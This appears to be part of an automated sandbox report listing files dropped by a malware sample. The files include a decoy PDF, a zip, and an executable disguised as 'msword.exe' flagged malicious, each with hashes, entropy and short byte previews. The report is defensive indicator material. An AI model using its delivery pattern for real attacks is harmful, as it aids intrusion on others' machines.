Preview:	>I.......<6...P.a... ..m.u.!'S7ba...d.....<.j..Rt.\|...P.<.....X.h5...@......./.p...~.Vx....m...J.......qQC..K\%..././.R...-....o........J.5....HF.e.....MJR...A..sC.V.......U..e.}.@.......l.....j......tt.G..Z...7\.3.a.TK[..g.9.W..Nl.o...%O.o.;T.6{...Np.-M....vF.y'.#..y&..w...W.b..X..B_..Y.4.E...W.5I(d8.P...t.N..]....T.y.v~.7...p.0yQ...<...'-)?K.w.o.[....W...f._3,!M..~..Vi.........\8xl.)8......y...Rr.2APH.}.Y.^.W..:......p.o.../....c.\../ea..Vi..@?....P...6Y....C^..a...=...%.m.^..R..J.h....4..&{... ...u....K.@~.$..PC....t....s...@.....0..@.5l..i<9f.....2...$w........3....Orfep......M.$...l.q.&G.0...b.@.C.Y...4.......t.E}.K..?'Q./..Eg.l]e...AXT....YJgG~.<.y......S.=&7B..S..>.....yc.W....u...a...o.s..Y.......6..{......OEq.l_.:.."\2b.nc#.-\|Cdg.L.........J.8{\| ..5...-.h....!.... f.W..p.^....&..].S6..=yj.....j.5[.). ^..L...n,..........Z.......M...<.:T8.....C,..'i.zp...z...9z...sq...b.E^.4=~.f..p.qgv......^.".c... ...eg..="..n

C:\Users\user\AppData\Local\Temp\Statistical

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	7938
Entropy (8bit):	6.234825901896176
Encrypted:	false
SSDEEP:	192:BHAeOqAFDw09CV/2nPvj6DdMP3r1HI5jMlbN+G3ygxn:BHAHhww+/2nlP3r1WAL3yQn
MD5:	E65ADD0B46D5C8C0DEC008C11CBD71A5
SHA1:	894028D96A4649AC5403F3CE0FAF0C686AED4E32
SHA-256:	17610DA19952CEA20324EA64C7D6A8F27F21C639845F1C14B21194A0F5C2EA99
SHA-512:	B5FF13313576084EE8B0631F4F7D2518186165D25F7AB3DF7273A8CEF2D47E1DF322602A36441A4072A94B1F5E55D75DC5706CF92DBCAAD72B29B9E397BE6649
Malicious:	false
Preview:	DimPieLilHot..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B..................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ygebxsu.14g.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e2yiommw.vza.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ftb3s2vx.bih.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iagtcxfe.4ka.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iyuihyik.0ov.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kvb5ceux.vds.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pp0ezn1d.zue.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xwg3o1db.opj.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-11 12-03-11-248.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393)
Category:	dropped
Size (bytes):	16525
Entropy (8bit):	5.345946398610936
Encrypted:	false
SSDEEP:	384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
MD5:	8947C10F5AB6CFFFAE64BCA79B5A0BE3
SHA1:	70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
SHA-256:	4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
SHA-512:	B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
Malicious:	false
Preview:	SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393), with CRLF line terminators
Category:	dropped
Size (bytes):	15114
Entropy (8bit):	5.365807730174085
Encrypted:	false
SSDEEP:	384:zdRQRRlUrBdUCq28J/e5TJTgqgSgtgSgE8MQ+l+hHVx3lS6wHmM53poO9RUREpBs:JDN
MD5:	C6F52AF0E62785D1BCC591E228949563
SHA1:	D3FB8EE9CE4AD3EAD3044ABC62BA5B6FE09B18EC
SHA-256:	980D883DA1E774C3B5C55BC41265016B912F78409495F153059791E9270D8BF9
SHA-512:	EA38B340A9947E223F568DFA1009786A01EB26ABEEDCE9CBF6FBD440A0167D2A9D48878CAC6B92AF74FF6FAFB3DDFE17433E35C8C21C17C153264B791B06B851
Malicious:	false
Preview:	SessionID=0a8c17af-2225-4a45-9f9a-afb2f8c47bf5.1733936591264 Timestamp=2024-12-11T12:03:11:264-0500 ThreadID=7428 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=0a8c17af-2225-4a45-9f9a-afb2f8c47bf5.1733936591264 Timestamp=2024-12-11T12:03:11:268-0500 ThreadID=7428 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=0a8c17af-2225-4a45-9f9a-afb2f8c47bf5.1733936591264 Timestamp=2024-12-11T12:03:11:268-0500 ThreadID=7428 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=0a8c17af-2225-4a45-9f9a-afb2f8c47bf5.1733936591264 Timestamp=2024-12-11T12:03:11:268-0500 ThreadID=7428 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=0a8c17af-2225-4a45-9f9a-afb2f8c47bf5.1733936591264 Timestamp=2024-12-11T12:03:11:268-0500 ThreadID=7428 Component=ngl-lib_NglAppLib Description="SetConf

C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	29752
Entropy (8bit):	5.3833559417767765
Encrypted:	false
SSDEEP:	768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2ro:U
MD5:	9C4AB9096E78881F3E51399FC1833646
SHA1:	B5CEF39C306FC4C0920B8BE1917DA8BB00521EC1
SHA-256:	F41687877F9541B27BBB5421621E7AF397EEFE3DABB3AB1D9A30A9833E6F4139
SHA-512:	701CEE6C8A8600F1E83DE9578D45E9B0AF2FB447A4A651C34C90F548C181FF9D142F624569AFC547B99391493C85AB96113486EDABEEF27047552D53FC73B57B
Malicious:	false
Preview:	03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : *************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***********************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : **** Starting new session ******..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-

C:\Users\user\AppData\Local\Temp\acrocef_low\44227558-9aa2-4bab-95bb-a9c223fd0d2d.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
Category:	dropped
Size (bytes):	1419751
Entropy (8bit):	7.976496077007677
Encrypted:	false
SSDEEP:	24576:/xA7owWLaGZDwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLaGZDwZGk3mlind9i4ufFXpAXkru
MD5:	18E3D04537AF72FDBEB3760B2D10C80E
SHA1:	B313CD0B25E41E5CF0DFB83B33AB3E3C7678D5CC
SHA-256:	BBEF113A2057EE7EAC911DC960D36D4A62C262DAE5B1379257908228243BD6F4
SHA-512:	2A5B9B0A5DC98151AD2346055DF2F7BFDE62F6069A4A6A9AB3377B644D61AE31609B9FC73BEE4A0E929F84BF30DA4C1CDE628915AC37C7542FD170D12DE41298
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\Temp\acrocef_low\7e3e6fa9-01f2-41d8-8e4c-775e4387c0be.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
Category:	dropped
Size (bytes):	1407294
Entropy (8bit):	7.97605879016224
Encrypted:	false
SSDEEP:	24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
MD5:	A0CFC77914D9BFBDD8BC1B1154A7B364
SHA1:	54962BFDF3797C95DC2A4C8B29E873743811AD30
SHA-256:	81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
SHA-512:	74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\Temp\acrocef_low\b6d91b5a-1509-4908-9002-ede529b6113b.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
Category:	dropped
Size (bytes):	758601
Entropy (8bit):	7.98639316555857
Encrypted:	false
SSDEEP:	12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
MD5:	3A49135134665364308390AC398006F1
SHA1:	28EF4CE5690BF8A9E048AF7D30688120DAC6F126
SHA-256:	D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
SHA-512:	BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
Malicious:	false
Preview:	...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......\|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!\|G.1...... .3.`./....`~......G.............\|..pS.e.C....:o.u_..oi.:..\|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

C:\Users\user\AppData\Local\Temp\acrocef_low\fe9d12fe-9851-4558-b303-fdd4586de4f9.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
Category:	dropped
Size (bytes):	386528
Entropy (8bit):	7.9736851559892425
Encrypted:	false
SSDEEP:	6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
MD5:	5C48B0AD2FEF800949466AE872E1F1E2
SHA1:	337D617AE142815EDDACB48484628C1F16692A2F
SHA-256:	F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
SHA-512:	44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
Malicious:	false
Preview:	...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....\|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-\|..h#.g.\.PO.\|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..\|m.WC.....\|.....e.[W.p.8...rm....^..x'......5!...\|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.\|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

C:\Users\user\AppData\Local\Temp\f.pdf

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PDF document, version 1.4, 4 pages
Category:	dropped
Size (bytes):	276302
Entropy (8bit):	7.83317883790279
Encrypted:	false
SSDEEP:	6144:f7TySmt1MtVReLAaFQfz33NKy1zdp7Vum1S6rpn7p5Xc7:jGSFUAaFInNKy1Dn1fn7plc7
MD5:	950557F66ABA12BF2797E9FC134B3DAA
SHA1:	B882BB3263A69B482C9914A6E2ADA437512C06BD
SHA-256:	7EC84FF21725BFFDE7F1301C5C3C34810FB1F92D690DBDDE3716860891E0588F
SHA-512:	03213B75B8383196478F20D0031C8E075D11FED31B89671405E48596F477955688AE234AE44A757E7931E4D5DF7846C644583FA2C60AC670596D219A99C88B91
Malicious:	true
Preview:	%PDF-1.4..%......1 0 obj..<< .. /BitsPerComponent 1 .. /ColorSpace 3 0 R .. /Height 3288 .. /Subtype /Image .. /Type /XObject .. /Width 2560 .. /Filter [.. /CCITTFaxDecode ].. .. /DecodeParms [.. << .. /BlackIs1 true .. /Columns 2560 .. /K -1 .. /Rows 3288 .. >>.. ].. .. /Length 2 0 R .. >>..stream..&.>.....m.F.....A.....d.......'d....r.d...9..x8...A....m...9...# U.a.Hs.f..@.....$..Xk w....nENS`f@....`...W.9....q.(.L).....`..M%..A...l.."m^@...B.g6...P....4.q..N...)...(......r..Jr......qY.H.D.v.Dq...$X.........T..$.g.^dH.A.9..A......Lz..d.l..A.C[.........e....E....L.... ...........<.P...$...8k......................&..}...?...............s5...~........._........_...........H...hLP.<..3"...4...."....#.5\.?...3......A...S..y+.BJD.. b!......x(]......T. A.< ._O_P.%.Z......"sK.5..G...!q.H.I'..E.D=..!....%t......g.#.;.H.gA.8........F.j.....:^...Y...H...P`.A.!....e.'.Ma.i.}8M{. ...D. .!..B. ..v.z.p.i='K.J...#.

C:\Users\user\AppData\Local\Temp\msword.zip

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	3802499
Entropy (8bit):	4.6033990571172305
Encrypted:	false
SSDEEP:	24576:cvQoCg23M7h2IqMNR4WbINxZAQlB+U0zUc:QQvg23M5R4WbI3LlAU0Uc
MD5:	AC1BB7433BD4A06FA226CFD057526675
SHA1:	A954C6F43448A85C209CA49408F02FF62A2EE08D
SHA-256:	CE5E1DBA0DFF8A00221D668D1E6B64419D57073F602CC12EEDFB8CCD46B403EB
SHA-512:	A0400A7A4C71C5725BF9295C7EB9F6E5C63C2ECA949F922C2A4C31C873EE72F595DBF70ED212CAE2B887E51B89D69F2446288227174A63F9A9429F1EBC888927
Malicious:	true
Preview:	PK..........\Y.F.%..:....5....msword.exe..\|T.?~.G.l.E...4BP....(qA......f.....@.9.h.&.....Zko.....[..J[+Q..@..Z........QW.a..............~...g.9..<...sf....#.M.$;.iJR.$.\|...4...H....e-.....6eYm..+.Y}.}.w.b.J.........V....,.o....rJ.mL..[.f]..Lr.5uJ6......vL....<X0e0...b..Q.z.....) K.lK.....n.uIVK.%G.V....$.$.j.....'.VI..%[.W.....i....&.H.........Iz.2>..g..........<5HZ2X..........Du.:....'..h..sa.%i...K.T.......#.>...&.0i....V..F.....:qE..........V...yN..FZ..S......K....5.....X..;p.............uN.:........n#...YR...05..9M.a.l.......C..#x...O...G.H_.#EegL>&..C.Q..&%cdy=.F..[]/.B...q~.z....f..v..........r..s.\.......?.C.Q=..v.&.zNv..m.;xaL..D.).....r..@k.#.Y.802.\|..3{Y.sm^a..~.<S]j..d..F-ThjU..:g..n....t.....Y....f^.,....eL..L.<..."=.........O...x....S(_...z..n.]bof......}.d.fu..U.p.[............X...4..mV.6+qIo.].l...jq.....r..z...`..5ZX.EUD.._.c..v...s.42...._,.%(.q........@.g.....T..];.....4.;..r46.:.Wl....XneO.....hc{.\|...z.,j

C:\Users\user\AppData\Local\Temp\msword\msword.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	891289591
Entropy (8bit):	4.230074047814782
Encrypted:	false
SSDEEP:
MD5:	C744E054E4EF01832BBF43B81D397B61
SHA1:	3360299F013BCD729FD1993280B9304605457238
SHA-256:	4EC9AD5867629EBDC9655123B138CBE63F7ED1EDFF2022B493DD075BD06C4E3D
SHA-512:	4DAC02819D1F0B2A56FD1131BDD6B64821B40A3403111DCF5EC58CB688778E8293BC1D41693AA3DC369B0A63A9967FF0CD641F0A2AD8B2678A9E1A0079A523FD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
